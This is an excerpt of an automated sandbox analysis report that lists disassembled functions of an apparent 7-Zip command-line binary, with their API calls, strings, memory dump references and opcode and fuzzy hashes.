                            • Associated: 0000000A.00000002.1847141728.00000000006D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847481070.000000000077C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847665775.0000000000792000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847759485.000000000079B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_6d0000_7zr.jbxd
                            Similarity
                            • API ID: H_prologfputs$fputc
                            • String ID:
                            • API String ID: 678540050-0
                            • Opcode ID: cd13e256e505c0cc175470ecedb4efa4411d3415a39f9bc9c902c0fd00664416
                            • Instruction ID: 78dfbe94d8e60e2b6659b1834065cca832b93c577a0c114a5aa9931dabf948e0
                            • Opcode Fuzzy Hash: cd13e256e505c0cc175470ecedb4efa4411d3415a39f9bc9c902c0fd00664416
                            • Instruction Fuzzy Hash: 0E11C231E04105ABCF4ABBA0D8239AEBBA7DF85790F00002FF502963D1CFA959418AD9
                            Function 006D7731 Relevance: 4.6, APIs: 3, Instructions: 60COMMON
                            Download Yara Rule
                            APIs
                            • SetFilePointer.KERNELBASE(00000002,?,00000000,?,00000002,00000002,?,00000002,?,006D77DB,?,?,00000000,?,006D7832,?), ref: 006D7773
                            • GetLastError.KERNEL32(?,006D77DB,?,?,00000000,?,006D7832,?,?,?,?,00000000), ref: 006D7780
                            • SetLastError.KERNEL32(00000000,?,?,006D77DB,?,?,00000000,?,006D7832,?,?,?,?,00000000), ref: 006D7797
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1847196084.00000000006D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 0000000A.00000002.1847141728.00000000006D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847481070.000000000077C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847665775.0000000000792000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847759485.000000000079B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_6d0000_7zr.jbxd
                            Similarity
                            • API ID: ErrorLast$FilePointer
                            • String ID:
                            • API String ID: 1156039329-0
                            • Opcode ID: f8cee92b0e96bb601ab2696f475d02c332eeae71a1fa5a3e64707d976da0dece
                            • Instruction ID: 45ddf4c8eec1377054a7233c42d006fa687f70e9db7e04f643728aa69357e88e
                            • Opcode Fuzzy Hash: f8cee92b0e96bb601ab2696f475d02c332eeae71a1fa5a3e64707d976da0dece
                            • Instruction Fuzzy Hash: 1811DD70A00309AFEF118F68DC45BEA3BE6AB08360F10882AF81697391E7B49D509B55
                            Function 006D5A8C Relevance: 4.6, APIs: 3, Instructions: 54COMMON
                            Download Yara Rule
                            APIs
                            • __EH_prolog.LIBCMT ref: 006D5A91
                            • SetFileAttributesW.KERNELBASE(?,?,?,?,00000000), ref: 006D5AB7
                            • SetFileAttributesW.KERNEL32(?,?,00000000,?,?,00000000), ref: 006D5AEC
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1847196084.00000000006D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 0000000A.00000002.1847141728.00000000006D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847481070.000000000077C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847665775.0000000000792000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847759485.000000000079B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_6d0000_7zr.jbxd
                            Similarity
                            • API ID: AttributesFile$H_prolog
                            • String ID:
                            • API String ID: 3790360811-0
                            • Opcode ID: 4aa9c07b16ed8a80bcdd48b47becf85ffbd69cb78119419e45eeed3a09735141
                            • Instruction ID: de42c3583f46842bcef11e1c6ceff67f25951310bd8d28f857a7757b7671ac82
                            • Opcode Fuzzy Hash: 4aa9c07b16ed8a80bcdd48b47becf85ffbd69cb78119419e45eeed3a09735141
                            • Instruction Fuzzy Hash: EA01F532D00215ABCF05ABA9D9916FEB777EF45350F18443BEC1263751CB398C01DA50
                            Function 006E5BEA Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 481COMMON
                            Download Yara Rule
                            APIs
                            • __EH_prolog.LIBCMT ref: 006E5BEF
                              • Part of subcall function 006E54C0: __EH_prolog.LIBCMT ref: 006E54C5
                              • Part of subcall function 006E5630: __EH_prolog.LIBCMT ref: 006E5635
                              • Part of subcall function 006F36EA: __EH_prolog.LIBCMT ref: 006F36EF
                              • Part of subcall function 006E57C1: __EH_prolog.LIBCMT ref: 006E57C6
                              • Part of subcall function 006E58BE: __EH_prolog.LIBCMT ref: 006E58C3
                            Strings
                            • Cannot seek to begin of file, xrefs: 006E610F
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1847196084.00000000006D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 0000000A.00000002.1847141728.00000000006D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847481070.000000000077C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847665775.0000000000792000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847759485.000000000079B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_6d0000_7zr.jbxd
                            Similarity
                            • API ID: H_prolog
                            • String ID: Cannot seek to begin of file
                            • API String ID: 3519838083-2298593816
                            • Opcode ID: 8a4dc96ac6dae5cc8801a1cf28d1c3ac37270986c8c0bce0357394101a146ad6
                            • Instruction ID: e2edee41b007796564caaf12ccaec3e84fed0bbe4ecb329198bc3d4247fbc7b3
                            • Opcode Fuzzy Hash: 8a4dc96ac6dae5cc8801a1cf28d1c3ac37270986c8c0bce0357394101a146ad6
                            • Instruction Fuzzy Hash: 781221309013859FCF26DFA5C884BEEBBB7AF24304F14042EE44697392DB70AA85CB51
                            Function 00714E8A Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 468COMMON
                            Download Yara Rule
                            APIs
                            • __EH_prolog.LIBCMT ref: 00714E8F
                              • Part of subcall function 006D965D: VariantClear.OLEAUT32(?), ref: 006D967F
                              • Part of subcall function 006D1E40: free.MSVCRT ref: 006D1E44
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1847196084.00000000006D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 0000000A.00000002.1847141728.00000000006D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847481070.000000000077C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847665775.0000000000792000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847759485.000000000079B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_6d0000_7zr.jbxd
                            Similarity
                            • API ID: ClearH_prologVariantfree
                            • String ID: file
                            • API String ID: 904627215-2359244304
                            • Opcode ID: cac5580aea409479ec58540f5191576a322836cf475a2b8550a336aae0f07eb9
                            • Instruction ID: 6eb6aaefc5eccd56bc3e189d61999fba6c6a12cbce3d61b4efe66e7bc6a10bc8
                            • Opcode Fuzzy Hash: cac5580aea409479ec58540f5191576a322836cf475a2b8550a336aae0f07eb9
                            • Instruction Fuzzy Hash: CB128E30D00249EFCF15EFE8C985ADDBBB6AF59344F20406DE405AB292DB75AE85CB14
                            Function 006F2CDB Relevance: 3.9, APIs: 1, Strings: 1, Instructions: 388COMMON
                            Download Yara Rule
                            APIs
                            • __EH_prolog.LIBCMT ref: 006F2CE0
                              • Part of subcall function 006D5E10: __EH_prolog.LIBCMT ref: 006D5E15
                              • Part of subcall function 006E41EC: _CxxThrowException.MSVCRT(?,00784A58), ref: 006E421A
                              • Part of subcall function 006D965D: VariantClear.OLEAUT32(?), ref: 006D967F
                            Strings
                            • Cannot create output directory, xrefs: 006F3070
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1847196084.00000000006D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 0000000A.00000002.1847141728.00000000006D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847481070.000000000077C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847665775.0000000000792000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847759485.000000000079B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_6d0000_7zr.jbxd
                            Similarity
                            • API ID: H_prolog$ClearExceptionThrowVariant
                            • String ID: Cannot create output directory
                            • API String ID: 814188403-1181934277
                            • Opcode ID: c544e28fa9edd412763080307b6a5d4c647923a98153bf0e96cc9f838ad13da9
                            • Instruction ID: 2d2ad22f52c389e3addbd1f250efdaec5051cabfee9e261786d98bef8e7d8ff4
                            • Opcode Fuzzy Hash: c544e28fa9edd412763080307b6a5d4c647923a98153bf0e96cc9f838ad13da9
                            • Instruction Fuzzy Hash: 89F16D70D0128EAFCF25EFA4C9A1AEDBBB6AF19300F1440AEE54567352DB309E45CB51
                            Function 0070C7D7 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 58COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            • fputs.MSVCRT ref: 0070C840
                              • Part of subcall function 006D25CB: _CxxThrowException.MSVCRT(?,00784A58), ref: 006D25ED
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1847196084.00000000006D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 0000000A.00000002.1847141728.00000000006D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847481070.000000000077C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847665775.0000000000792000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847759485.000000000079B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_6d0000_7zr.jbxd
                            Similarity
                            • API ID: ExceptionThrowfputs
                            • String ID:
                            • API String ID: 1334390793-399585960
                            • Opcode ID: 01de07b85aac073b70af42cd1635e38a28933ffa7e5ec2dd3c818551f19e9fa8
                            • Instruction ID: e4edfd980cd8e8103042b336d9295873736398a0305928a88cdb11e1095bd549
                            • Opcode Fuzzy Hash: 01de07b85aac073b70af42cd1635e38a28933ffa7e5ec2dd3c818551f19e9fa8
                            • Instruction Fuzzy Hash: 2111C4716047449FDB16CF58C8D1BAAFBE6EF49304F04856EE1468B291C7B5BC44C764
                            Function 00706086 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 50COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1847196084.00000000006D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 0000000A.00000002.1847141728.00000000006D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847481070.000000000077C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847665775.0000000000792000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847759485.000000000079B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_6d0000_7zr.jbxd
                            Similarity
                            • API ID: fputs
                            • String ID: Open
                            • API String ID: 1795875747-71445658
                            • Opcode ID: 8a279a4b6288690e27f298353bcf56a7512af0bddd961e360b39820e6d135e00
                            • Instruction ID: 7153038ff54ae89d06811685832e81b85b88e0bb62e5705c25c66ead818f181e
                            • Opcode Fuzzy Hash: 8a279a4b6288690e27f298353bcf56a7512af0bddd961e360b39820e6d135e00
                            • Instruction Fuzzy Hash: B811BC32500704DFC760EF34D9A1ADABBE2EB24310B40862EE19A87252DA39A854CF54
                            Function 006E58BE Relevance: 3.3, APIs: 2, Instructions: 253COMMON
                            Download Yara Rule
                            APIs
                            • __EH_prolog.LIBCMT ref: 006E58C3
                              • Part of subcall function 006D6C72: __EH_prolog.LIBCMT ref: 006D6C77
                              • Part of subcall function 006D1E40: free.MSVCRT ref: 006D1E44
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1847196084.00000000006D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 0000000A.00000002.1847141728.00000000006D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847481070.000000000077C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847665775.0000000000792000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847759485.000000000079B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_6d0000_7zr.jbxd
                            Similarity
                            • API ID: H_prolog$free
                            • String ID:
                            • API String ID: 2654054672-0
                            • Opcode ID: d094874f0ffce0359a60ef03a471d9616a2b3842ea85460186d051c2353fd125
                            • Instruction ID: 064c4bb5c02c16bbc5921a13ae47aa109de6e28dcd812b2d33c44f90e66ed245
                            • Opcode Fuzzy Hash: d094874f0ffce0359a60ef03a471d9616a2b3842ea85460186d051c2353fd125
                            • Instruction Fuzzy Hash: 06911431901685DFCF21EBA5C891AEEBBB3AF44348F20406EE843A7352DB319D45CB65
                            Function 007206AE Relevance: 3.2, APIs: 2, Instructions: 206COMMON
                            Download Yara Rule
                            APIs
                            • __EH_prolog.LIBCMT ref: 007206B3
                            • _CxxThrowException.MSVCRT(?,0078D480), ref: 007208F2
                              • Part of subcall function 006D1E0C: malloc.MSVCRT ref: 006D1E1F
                              • Part of subcall function 006D1E0C: _CxxThrowException.MSVCRT(?,00784B28), ref: 006D1E39
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1847196084.00000000006D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 0000000A.00000002.1847141728.00000000006D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847481070.000000000077C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847665775.0000000000792000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847759485.000000000079B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_6d0000_7zr.jbxd
                            Similarity
                            • API ID: ExceptionThrow$H_prologmalloc
                            • String ID:
                            • API String ID: 3044594480-0
                            • Opcode ID: 4af947873f9ac12fac175b9bbd76aba6507c87d076d2be0bfe903385db5aa7d5
                            • Instruction ID: 3e5652ac9615c7fcc1c6d73d48ace17f6fda26a50fb8661586d4e3a104c2f62b
                            • Opcode Fuzzy Hash: 4af947873f9ac12fac175b9bbd76aba6507c87d076d2be0bfe903385db5aa7d5
                            • Instruction Fuzzy Hash: 33916E71D00259DFCF21DFA8D885AEEBBB5BF09304F144099E849A7252D734AE45CFA1
                            Function 006E7190 Relevance: 3.1, APIs: 2, Instructions: 138COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1847196084.00000000006D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 0000000A.00000002.1847141728.00000000006D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847481070.000000000077C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847665775.0000000000792000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847759485.000000000079B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_6d0000_7zr.jbxd
                            Similarity
                            • API ID: H_prolog
                            • String ID:
                            • API String ID: 3519838083-0
                            • Opcode ID: 534434a814edb653c988d48d1b31bb04a9e95955f3b8187a1d7872153894ddbe
                            • Instruction ID: 7a3bd82378287612915ba2838a61a750b1f64add860cb76a7e410ff498df6026
                            • Opcode Fuzzy Hash: 534434a814edb653c988d48d1b31bb04a9e95955f3b8187a1d7872153894ddbe
                            • Instruction Fuzzy Hash: 0851917090AB809FDB65CF75C490AEABBF2BF45300F18885DE5DA4B202D731BA85DB50
                            Function 006F7B48 Relevance: 3.1, APIs: 2, Instructions: 122COMMON
                            Download Yara Rule
                            APIs
                            • __EH_prolog.LIBCMT ref: 006F7B4D
                            • memcpy.MSVCRT(00000000,007927DC,00000000,00000000,?,?,00000000,00000000,00000000,00000002), ref: 006F7C65
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1847196084.00000000006D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 0000000A.00000002.1847141728.00000000006D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847481070.000000000077C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847665775.0000000000792000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847759485.000000000079B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_6d0000_7zr.jbxd
                            Similarity
                            • API ID: H_prologmemcpy
                            • String ID:
                            • API String ID: 2991061955-0
                            • Opcode ID: af6296526d489974b45b0ee1dab9b8de92e87c5345d09396b8ade86fda2fe16f
                            • Instruction ID: 8b3cae81623df0b3be677f12ab0e4d7544d6ff693735431b3dd3613f49d98e0b
                            • Opcode Fuzzy Hash: af6296526d489974b45b0ee1dab9b8de92e87c5345d09396b8ade86fda2fe16f
                            • Instruction Fuzzy Hash: 9641687090421C9FCF20EFA4C951AEEB7F6BF14300F10446EE546A7392DB35AA0ACB55
                            Function 00721511 Relevance: 3.0, APIs: 2, Instructions: 39COMMON
                            Download Yara Rule
                            APIs
                            • __EH_prolog.LIBCMT ref: 00721516
                              • Part of subcall function 007210D3: __EH_prolog.LIBCMT ref: 007210D8
                            • _CxxThrowException.MSVCRT(?,0078D480), ref: 00721561
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1847196084.00000000006D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 0000000A.00000002.1847141728.00000000006D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847481070.000000000077C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847665775.0000000000792000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847759485.000000000079B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_6d0000_7zr.jbxd
                            Similarity
                            • API ID: H_prolog$ExceptionThrow
                            • String ID:
                            • API String ID: 2366012087-0
                            • Opcode ID: 237543759bcb20f793a4b53157749e01bcb1154e8eb9de0e6b1d9f7f8c06ef01
                            • Instruction ID: 1cf88482456e6c2ec88c81b10b1efc8917ce718b7cbaaba2401cecd42cee864e
                            • Opcode Fuzzy Hash: 237543759bcb20f793a4b53157749e01bcb1154e8eb9de0e6b1d9f7f8c06ef01
                            • Instruction Fuzzy Hash: EE01F272500288EEDF128F94D819BEF7FB8FF91350F44406AF8095A112C3B9E9A187A1
                            Function 007057FB Relevance: 3.0, APIs: 2, Instructions: 29COMMON
                            Download Yara Rule
                            APIs
                            • __EH_prolog.LIBCMT ref: 00705800
                            • fputs.MSVCRT ref: 00705830
                              • Part of subcall function 006D1FA0: fputc.MSVCRT ref: 006D1FA7
                              • Part of subcall function 006D1E40: free.MSVCRT ref: 006D1E44
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1847196084.00000000006D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 0000000A.00000002.1847141728.00000000006D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847481070.000000000077C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847665775.0000000000792000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847759485.000000000079B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_6d0000_7zr.jbxd
                            Similarity
                            • API ID: H_prologfputcfputsfree
                            • String ID:
                            • API String ID: 195749403-0
                            • Opcode ID: 409d65270c61c3a2ccaaecad513aa022fa896f5975b96a78133ff0bb07082ac8
                            • Instruction ID: d35b77074880c3cd0478e05d3ea8844a5df7a3789b530f39d9b472bb46cb3b2f
                            • Opcode Fuzzy Hash: 409d65270c61c3a2ccaaecad513aa022fa896f5975b96a78133ff0bb07082ac8
                            • Instruction Fuzzy Hash: 81F03A32900508DBCB1AEBA4E8166DEBBB2EF04750F10842EE406A61D1CB795995CB88
                            Function 006D950D Relevance: 3.0, APIs: 2, Instructions: 26memoryCOMMON
                            Download Yara Rule
                            APIs
                            • SysAllocStringLen.OLEAUT32(?,?), ref: 006D952C
                            • _CxxThrowException.MSVCRT(?,007855B8), ref: 006D954A
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1847196084.00000000006D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 0000000A.00000002.1847141728.00000000006D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847481070.000000000077C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847665775.0000000000792000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847759485.000000000079B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_6d0000_7zr.jbxd
                            Similarity
                            • API ID: AllocExceptionStringThrow
                            • String ID:
                            • API String ID: 3773818493-0
                            • Opcode ID: 301c36f60c9b4fa9ad60171345b9784928fb13ff7d94e6c434932d7a64357c3f
                            • Instruction ID: 4c494d4f65f6a90360a7cf11194887a0eb7c9701160c1c308a856b30fbd92442
                            • Opcode Fuzzy Hash: 301c36f60c9b4fa9ad60171345b9784928fb13ff7d94e6c434932d7a64357c3f
                            • Instruction Fuzzy Hash: 8DF0C972650304ABC751EFA8D889D867BEDAF09780740846EF949CB711E779E8508B94
                            Function 0070B5B1 Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1847196084.00000000006D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 0000000A.00000002.1847141728.00000000006D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847481070.000000000077C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847665775.0000000000792000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847759485.000000000079B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_6d0000_7zr.jbxd
                            Similarity
                            • API ID: fputs$fputc
                            • String ID:
                            • API String ID: 1185151155-0
                            • Opcode ID: c01a988e797467757d9f04aea6ed6505c8c98caa95fb3fcd347c8df1c7c6936a
                            • Instruction ID: 46c8142fad76821aa9a772b701fb75b71299efd83cb7880f6b7067547a5af4e7
                            • Opcode Fuzzy Hash: c01a988e797467757d9f04aea6ed6505c8c98caa95fb3fcd347c8df1c7c6936a
                            • Instruction Fuzzy Hash: F4E08C37689110AFD61A2B98BC0185427D6DB8A365335012FEA40D32A0AB5B2D295BA8
                            Function 00767E00 Relevance: 3.0, APIs: 2, Instructions: 23COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1847196084.00000000006D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 0000000A.00000002.1847141728.00000000006D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847481070.000000000077C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847665775.0000000000792000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847759485.000000000079B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_6d0000_7zr.jbxd
                            Similarity
                            • API ID: ErrorLast_beginthreadex
                            • String ID:
                            • API String ID: 4034172046-0
                            • Opcode ID: 4b090266e60036dc2708e2be85ea590ea9c00bec2846a7159341e5c47fb24f95
                            • Instruction ID: af5bee1ccab70f5218fb423061757b418e9a5c13d9b9037a3e84ca69afc6af3f
                            • Opcode Fuzzy Hash: 4b090266e60036dc2708e2be85ea590ea9c00bec2846a7159341e5c47fb24f95
                            • Instruction Fuzzy Hash: F3E0C2B2208202ABF3149B60DC06FB7729CEBA0B84F40847DFE46C6180E665CD00C3B5
                            Function 006D9C4D Relevance: 3.0, APIs: 2, Instructions: 7COMMON
                            Download Yara Rule
                            APIs
                            • GetCurrentProcess.KERNEL32(?,?,006D9C6E), ref: 006D9C52
                            • GetProcessAffinityMask.KERNEL32(00000000), ref: 006D9C59
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1847196084.00000000006D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 0000000A.00000002.1847141728.00000000006D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847481070.000000000077C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847665775.0000000000792000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847759485.000000000079B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_6d0000_7zr.jbxd
                            Similarity
                            • API ID: Process$AffinityCurrentMask
                            • String ID:
                            • API String ID: 1231390398-0
                            • Opcode ID: da49cd8bab844ee11b20922653466dd4ea6bce6b95e136d78fedab427803f566
                            • Instruction ID: f00e8fcc847a077cea32bab432311d632b3efb7d4b2760251970c86d7683fd47
                            • Opcode Fuzzy Hash: da49cd8bab844ee11b20922653466dd4ea6bce6b95e136d78fedab427803f566
                            • Instruction Fuzzy Hash: 1EB092B2400200EBCE119BA09D0CC563B2CAB082413008648B10DC2010C63AC085CBA8
                            Function 006DB668 Relevance: 2.7, APIs: 2, Instructions: 222COMMON
                            Download Yara Rule
                            APIs
                            • memcpy.MSVCRT(?,00000000,00000000,00000000,00040000,?), ref: 006DB843
                            • GetLastError.KERNEL32 ref: 006DB8AA
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1847196084.00000000006D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 0000000A.00000002.1847141728.00000000006D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847481070.000000000077C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847665775.0000000000792000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847759485.000000000079B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_6d0000_7zr.jbxd
                            Similarity
                            • API ID: ErrorLastmemcpy
                            • String ID:
                            • API String ID: 2523627151-0
                            • Opcode ID: 8f17a7e518969ddbdbd88cd17bd3fd54093c25323e0838194437bc6a5bde9b8c
                            • Instruction ID: db20124d260e30a9703db9a84d66c1ae21205068e7c58eacb2e541d395bfd648
                            • Opcode Fuzzy Hash: 8f17a7e518969ddbdbd88cd17bd3fd54093c25323e0838194437bc6a5bde9b8c
                            • Instruction Fuzzy Hash: 32812631A00705DFDB64CE25C980AAAB7F7BF88314F166A2EE84687B48D734F8459B54
                            Function 006D1E0C Relevance: 2.5, APIs: 2, Instructions: 18COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1847196084.00000000006D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 0000000A.00000002.1847141728.00000000006D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
